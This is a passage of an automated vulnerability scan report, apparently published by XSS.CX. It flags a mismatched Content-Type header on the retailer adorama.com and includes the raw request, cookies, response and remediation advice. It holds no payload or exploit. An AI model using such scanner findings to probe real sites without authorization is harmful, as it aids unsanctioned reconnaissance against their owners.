HTTP/1.1 502 Bad Gateway Server: Microsoft-IIS/6.0 ServerID: 5 X-Powered-By: ASP.NET Content-Type: text/html Content-Length: 232 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 04:33:33 GMT Connection: close
<html><head><title>Error</title></head><body><head><title>Error in CGI Application</title></head> <body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning a complete set of HT ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /searchsite/default.aspx?searchinfo=Sony%20SXS&category=4294965949 1012 HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 20 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 04:31:27 GMT Connection: close
<h1>Bad Request</h1>
Report generated by XSS.CX at Mon Dec 27 10:29:25 CST 2010.